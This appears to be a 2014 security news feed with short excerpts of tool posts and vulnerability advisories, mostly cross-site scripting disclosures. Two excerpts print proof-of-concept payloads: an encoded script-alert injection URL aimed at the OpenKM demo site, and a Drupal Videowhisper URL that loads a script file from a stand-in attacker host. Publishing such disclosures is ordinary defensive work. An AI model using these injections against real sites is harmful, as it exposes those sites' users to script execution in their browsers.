RoboCop RoboCopy – A graphical interface for RoboCopy

4 December 2014 - Source: http://www.winserver.it
“RoboCop RoboCopy”… the name sounds almost like a comic book, but this utility, available on SourceForge, adds a very convenient graphical interface to Robocopy. With this software it is much easier to manage a synchronization and, above all, to “parametrize” Robocopy so that the command line is no longer needed for the various options. The software also adds some […]...


Drupal Memory Exhaustion

2 December 2014 - Source: http://www.mondounix.com
====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Drupal < 7.34 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).
 
====================================================================
Time Line:
====================================================================
 
November 19, 2014 - A Drupal security update and the security advisory is published.
 
====================================================================
Proof of Concept:
====================================================================
 
Generate...


Nagios and Web content: a script to check the HTML code of our website

25 November 2014 - Source: http://nazarenolatella.myblog.it

In this blog I have devoted several posts to Nagios, which in my opinion is one of the best open source NMSs around. Among the various plugins provided by this monitoring software is check_http, which is able to send specific requests to the website we want to monitor, reporting any connection problems or protocol errors (401, 403, 404, 500, etc.).

...


Supr Shopsystem 5.1.0 Cross Site Scripting

23 November 2014 - Source: http://www.mondounix.com
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
 
 
Release Date:
=============
2014-11-07
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1353
 
 
Common Vulnerability Scoring System:
====================================
3.1
 
 
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store to create its own online store very quickly and easily.
Without any installation or web space of your own, you can begin to create products and content right after...


Joomla Simple Email Form 1.8.5 Cross Site Scripting

20 November 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23241
Product: Simple Email Form Joomla Extension
Vendor: Doug Bierer
Vulnerable Version(s): 1.8.5 and probably prior
Tested Version: 1.8.5
Advisory Publication:  October 29, 2014  [without technical details]
Vendor Notification: October 29, 2014 
Public Disclosure: November 19, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8539
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...


Pandora FMS 5.1SP1 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
I. VULNERABILITY
 
-------------------------
 
XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 - Revisión PC141031
 
II. BACKGROUND
Pandora FMS is the monitoring software chosen by several companies all around the world for managing their IT infrastructure. Besides ensuring high performance and maximum flexibility, it has a...
 
III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Pandora FMS in the page visualization agents, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
 
The code injection is done through the parameter "refr" in the page “/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=”
 
IV....


Openkm Document Management System 6.4.17 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
Openkm Document Management System Suffers From Cross Site Scripting Attack
 
http://khalil-shreateh.com/khalil.shtml/images/articles/websites/vulnerabilities/openkm.jpg
 
Version <=6.4.17
Software Test http://demo.openkm.com/OpenKM/login.jsp
Author: Khalil Shreateh (https://www.facebook.com/khalil.shr)
 
Author Website: http://khalil-shreateh.com
Status: Reported.
Report Link: http://issues.openkm.com/view.php?id=3056
 
Attack Description
 
Log in with any user.
Navigate to:
http://demo.openkm.com/OpenKM/frontend/Download?export&uuid=%3Cscript%3Ealert%28%22XSS%20BY%20KHALIL%20SHREATEH\nkhalil-shreateh.com%22%29%3C/script%3E
 
 
 
POC...


Nibbleblog 4.0.1 Cross Site Scripting

18 November 2014 - Source: http://www.mondounix.com
=============================================
MGC ALERT 2014-002
- Original release date: March 5, 2014
- Last revised:  November 17, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Reflected XSS in Nibbleblog <= v4.0.1
 
II. BACKGROUND
-------------------------
Nibbleblog is a powerful engine for creating blogs; all you need is PHP to work.
 
III. DESCRIPTION
-------------------------
A reflected XSS vulnerability has been detected in Nibbleblog, which allows arbitrary HTML/script code to be executed in the context of the victim user's browser.
 
The code injection...


BookFresh Persistent Cross Site Scripting

8 November 2014 - Source: http://www.mondounix.com
Document Title:
===============
BookFresh - Persistent Clients Invite Vulnerability
 
 
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1351
 
 
Release Date:
=============
2014-10-28
 
 
Vulnerability Laboratory ID (VL-ID):
====================================
1351
 
 
Common Vulnerability Scoring System:
====================================
3.9
 
 
Product & Service Introduction:
===============================
BookFresh is an innovative scheduling software program that sets the standard for 21st century appointment management and creation for small businesses. 
Bookfresh connects small business owners and customers instantly....


Drupal 7 Videowhisper Cross Site Scripting

7 November 2014 - Source: http://www.mondounix.com
Hello,
 
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.
 
Vendor Notification: 22, Oct 2014
 
Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
 
POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt
 
The content of xss.txt:
<root>
  <script xmlns="http://www.w3.org/2000/svg"><![CDATA[
    alert('XSS');
  ]]></script>
</root>
 
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.
 
Best regards

...
